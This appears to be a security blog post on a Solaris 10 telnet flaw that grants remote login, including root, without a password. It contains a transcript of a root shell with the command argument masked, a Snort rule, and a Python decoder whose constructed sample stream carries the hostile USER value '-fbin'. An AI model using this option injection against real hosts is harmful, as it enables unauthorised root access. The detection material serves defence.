On the full-disclosure list someone has posted another 0-day, this time for Solaris 10 and the upcoming 11. Initial evidence suggests that this does not affect prior versions. The vulnerability allows an attacker to log in remotely as any user without authentication. Contrary to what I've read on other sites, I have been able to confirm that this includes the ability to log in as root (on Solaris 10u1 anyway). What's even scarier is that no exploit code is required; a standard telnet client is all that is needed.
Here's an example of how easy it is to exploit this:
```
chris@pentest:~$ telnet ********** 172.30.1.113
Trying 172.30.1.113...
Connected to 172.30.1.113.
Escape character is '^]'.
Last login: Sun Feb 11 21:31:24 from 172.30.1.202
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
You have new mail.
# uname -a;id
SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc
uid=0(root) gid=0(root)
#
```
The above example was against a default install Solaris 10 update 1 system. Although this would have been a big deal five years ago, today hopefully everyone has telnet disabled, especially from the Internet. I've written a Snort rule to detect this activity:
```
alert tcp any any -> any 23 (msg:"BLEEDING-EDGE EXPLOIT \
Solaris telnet USER environment vuln"; flow:to_server,established; \
content: "|ff fa 27 00 00 55 53 45 52 01 2d 66|"; rawbytes; \
classtype: attempted-user; sid:100002; rev:2;)
```
The content check is looking for the following byte sequence (the telnet NEW-ENVIRON suboption carrying a USER variable whose value begins with "-f"):

```
ff fa        IAC SB
27           NEW-ENVIRON
00 00        IS VAR
55 53 45 52  "USER"
01           VALUE
2d 66        "-f"
```
The RFCs for telnet are ftp://ftp.rfc-editor.org/in-notes/rfc854.txt and ftp://ftp.rfc-editor.org/in-notes/rfc1571.txt
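To show what that content match actually decodes, here is an added example (not code from the original diary) that parses telnet NEW-ENVIRON suboptions from a byte stream and flags a USER variable whose value starts with an option dash, the same condition the Snort rule expresses as a literal byte match. The option and type codes come from RFC 854 and RFC 1572; the two packets embedded in it are constructed samples, not captures. Because it decodes the suboption rather than matching fixed bytes, it also handles the USERVAR type code and ESC sequences, so it is less tied to one exact byte layout than the rule's content string.

```python
"""Decode telnet NEW-ENVIRON suboptions and flag a USER value that looks like
a command-line option. Added example; constants per RFC 854 / RFC 1572."""

IAC, SB, SE = 0xFF, 0xFA, 0xF0          # telnet command bytes (RFC 854)
NEW_ENVIRON = 0x27                       # option 39 (RFC 1572)
ENV_IS, ENV_SEND, ENV_INFO = 0, 1, 2     # NEW-ENVIRON sub-commands
ENV_VAR, ENV_VALUE, ENV_ESC, ENV_USERVAR = 0, 1, 2, 3   # type codes

# The exact byte string the Snort rule's content match looks for.
SNORT_CONTENT = bytes.fromhex("ff fa 27 00 00 55 53 45 52 01 2d 66")

# Constructed sample streams (not captures). The first carries USER=-fbin,
# the account mentioned in the diary; the second is an ordinary login.
SAMPLE_ATTACK = (b"\xff\xfb\x27"                                  # WILL NEW-ENVIRON
                 + b"\xff\xfa\x27\x00\x00USER\x01-fbin\xff\xf0"   # IAC SB ... IAC SE
                 + b"\r\n")
SAMPLE_BENIGN = (b"\xff\xfb\x27"
                 + b"\xff\xfa\x27\x00\x00USER\x01chris\x00DISPLAY\x01host:0\xff\xf0"
                 + b"\r\n")


def iter_suboptions(data: bytes):
    """Yield (option, payload) for every IAC SB <opt> ... IAC SE in the stream.
    Simplification: a doubled IAC inside a payload is not un-escaped."""
    i = 0
    while True:
        start = data.find(bytes([IAC, SB]), i)
        if start < 0:
            return
        end = data.find(bytes([IAC, SE]), start + 2)
        if end < 0:
            return
        body = data[start + 2:end]
        if body:
            yield body[0], body[1:]
        i = end + 2


def parse_new_environ(payload: bytes) -> dict:
    """Parse an IS/INFO payload into {name: value}; SEND (server -> client)
    carries no values and yields {}."""
    if not payload or payload[0] not in (ENV_IS, ENV_INFO):
        return {}
    tokens = []                      # (type_code, bytearray of text)
    i = 1
    while i < len(payload):
        b = payload[i]
        if b in (ENV_VAR, ENV_VALUE, ENV_USERVAR):
            tokens.append((b, bytearray()))
        elif b == ENV_ESC and i + 1 < len(payload):
            i += 1                   # next byte is literal, even if it is a type code
            if tokens:
                tokens[-1][1].append(payload[i])
        elif tokens:
            tokens[-1][1].append(b)
        i += 1
    env, name = {}, None
    for code, text in tokens:
        s = bytes(text).decode("latin-1")
        if code in (ENV_VAR, ENV_USERVAR):
            name = s
            env[name] = ""           # variable announced without a value
        elif code == ENV_VALUE and name is not None:
            env[name] = s
    return env


def scan_stream(data: bytes) -> list:
    """Return the environment of every NEW-ENVIRON suboption whose USER value
    begins with '-' (the '-f<user>' case the rule targets is one instance)."""
    alerts = []
    for opt, payload in iter_suboptions(data):
        if opt != NEW_ENVIRON:
            continue
        env = parse_new_environ(payload)
        user = env.get("USER")
        if user is not None and user.startswith("-"):
            alerts.append(env)
    return alerts


def matches_snort_content(data: bytes) -> bool:
    """Literal byte match, equivalent to the rule's content option."""
    return SNORT_CONTENT in data


if __name__ == "__main__":
    for label, stream in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(label, "decoded:", scan_stream(stream),
              "content-match:", matches_snort_content(stream))
```

Both checks agree on the two samples; the decoder is the one to extend if you want to log the full environment the client sent or to alert on other variables.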
Later versions of Solaris prompt during install whether telnet should be enabled. Also, in later versions this doesn't work for root: an attacker would have to use -fbin or another account and then use a local exploit to gain root.
The first blog sighting of this vulnerability can be found here: Errata Security. More information is at Computer Defense.
Some of the links about this vulnerability on these sites point to pages that contain content that is not safe for a work environment.
If you are still using telnet, now's the time to disable it.